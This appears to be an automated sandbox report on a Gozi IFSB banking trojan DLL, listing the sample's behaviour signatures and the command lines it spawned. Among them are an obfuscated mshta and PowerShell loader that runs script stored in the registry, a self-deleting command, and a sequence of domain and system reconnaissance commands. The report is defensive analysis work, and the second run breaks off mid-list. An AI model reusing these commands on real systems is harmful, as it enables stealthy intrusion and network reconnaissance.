Malware Analysis Report

2025-08-06 04:26

Sample ID 220124-l6sx2sebc2
Target 61ee6edf7de65.dll
SHA256 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
Tags

gozi_ifsb 20000 banker trojan

Score

10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

10/10

SHA256

06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf

Threat Level: Known bad

The file 61ee6edf7de65.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 20000 banker trojan

Gozi, Gozi IFSB

Blocklisted process makes network request

Deletes itself

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Enumerates processes with tasklist

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Runs ping.exe

Discovers systems in the same network

Modifies Internet Explorer settings

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-24 10:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-24 10:09

Reported

2022-01-24 10:11

Platform

win7-en-20211208

Max time kernel

143s

Max time network

122s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1048 set thread context of 1284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1284 set thread context of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1592 set thread context of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1284 set thread context of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1900 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1176 wrote to memory of 1048 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 1028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1028 wrote to memory of 1888 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1048 wrote to memory of 752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 752 wrote to memory of 264 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1048 wrote to memory of 1284 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1284 wrote to memory of 1592 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1592 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1284 wrote to memory of 1612 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1612 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1284 wrote to memory of 1020 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 748 wrote to memory of 1368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1284 wrote to memory of 1832 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 1284 wrote to memory of 1800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 980 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shva='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shva).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\A97B9ACF-F490-C387-46ED-68A7DA711CCB\\\StartDevice'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name micdnux -value gp; new-alias -name wsfkguhx -value iex; wsfkguhx ([System.Text.Encoding]::ASCII.GetString((micdnux "HKCU:Software\AppDataLow\Software\Microsoft\A97B9ACF-F490-C387-46ED-68A7DA711CCB").OptionsAbout))

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffdjt0df.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES52D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC52C2.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7cp2lteu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES535F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC535E.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B840.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B840.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\4868.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\4868.bin1 > C:\Users\Admin\AppData\Local\Temp\4868.bin & del C:\Users\Admin\AppData\Local\Temp\4868.bin1"

Network


Files


Analysis: behavioral2

Detonation Overview

Submitted

2022-01-24 10:09

Reported

2022-01-24 10:11

Platform

win10-en-20211208

Max time kernel

151s

Max time network

124s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3008 set thread context of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 set thread context of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 set thread context of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2304 set thread context of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 3020 set thread context of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 set thread context of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3804 wrote to memory of 3140 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3804 wrote to memory of 3140 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3804 wrote to memory of 3140 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3728 wrote to memory of 3008 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 3008 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 1224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3008 wrote to memory of 1224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1224 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1224 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3008 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3008 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4028 wrote to memory of 1252 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 1252 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 3020 wrote to memory of 3260 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 3260 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3260 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3260 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3020 wrote to memory of 2892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 2028 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2028 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 1748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 756 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 756 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3020 wrote to memory of 1792 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1792 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2676 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2676 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2676 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Luo9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Luo9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vawdrha -value gp; new-alias -name yhwgucfiht -value iex; yhwgucfiht ([System.Text.Encoding]::ASCII.GetString((vawdrha "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp" "c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

